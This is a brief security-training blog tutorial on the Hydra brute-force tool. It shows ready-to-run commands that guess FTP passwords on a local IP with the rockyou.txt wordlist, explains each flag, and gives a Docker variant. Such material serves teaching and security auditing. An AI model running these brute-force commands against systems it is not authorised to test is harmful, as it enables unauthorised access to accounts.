Hacking Tool: hydra

Brute force login cracker

Hacking Tool: hydra

posted in security on

Show how easy it would be to gain unauthorized access to a system remotely.

What

Hydra is a brute-force tool to perform dictionary attacks against protocols such as Ftp, Http(s), Cisco, Oracle, Postgres, SMTP, Telnet, SSH and many more.

vanhauser-thc/thc-hydra : hydra

How

hydra -l user -P rockyou.txt ftp://192.168.1.6 -t8 -v -I

Flags used:

  • -l user: the vulnerable username
    • -L file: load several logins from file
  • -P file: the wordlist file
  • ftp//ip: the service://server[:PORT]
  • -t8: amount of parallel attempts (default 16)
  • -v: verbose mode
    • -V: show login+pass for each attempt
    • -d: debug mode
  • -I: ignore an existing restore file

Docker

This assumes that you have a wordlist.txt file in your working directory.

# Display all options
docker run --rm vanhauser/hydra -h

# Map a volume with a wordlist
docker run -v $(pwd):/data --rm vanhauser/hydra -l user -P /data/wordlist.txt ftp://ip -t8 -v -I

Wordlists

Wordlists contain common passwords. A famous one is rockyou.txt (14M).

When

Whenever you figure out that a certain protocol and user has a weak password, it’s time to whip out Hydra! Check the Security Audit Blog during itenium’s Security Bootcamp for such clue!


Other interesting reads
Tags: tutorial hacking